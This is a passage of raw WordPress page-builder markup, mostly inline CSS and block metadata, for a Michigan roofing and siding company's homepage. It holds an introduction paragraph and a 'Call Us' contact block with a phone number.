style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"88555fca-6dda-4435-9d42-f653c9586df1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-88555fca-6dda-4435-9d42-f653c9586df1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"cd3cb9ff-14b9-4cad-bfef-2367d403384a\"} -->\n<style type=\"text/css\"> .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd3cb9ff-14b9-4cad-bfef-2367d403384a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f159bdd-7f31-4f5d-8116-79161efa80a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f159bdd-7f31-4f5d-8116-79161efa80a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"426cabfe-a2cd-4360-aecf-17fd567995fe\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-426cabfe-a2cd-4360-aecf-17fd567995fe background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"6a199a30-74a8-487c-b888-156f1279eaf9\"} -->\n<style type=\"text/css\"> .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6a199a30-74a8-487c-b888-156f1279eaf9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"5a7066fe-d425-4153-8844-d8ae7a4116af\"} -->\n<style type=\"text/css\"> .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a7066fe-d425-4153-8844-d8ae7a4116af\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"6836f24b-2686-4a49-bdc2-b859683a37cf\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"2019a28c-9fe4-4261-8545-472fe8f25e18\"} -->\n<style type=\"text/css\"> .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2019a28c-9fe4-4261-8545-472fe8f25e18\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"eb27f5f4-746e-46f7-8c6c-1546ed348b06\"} -->\n<style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n 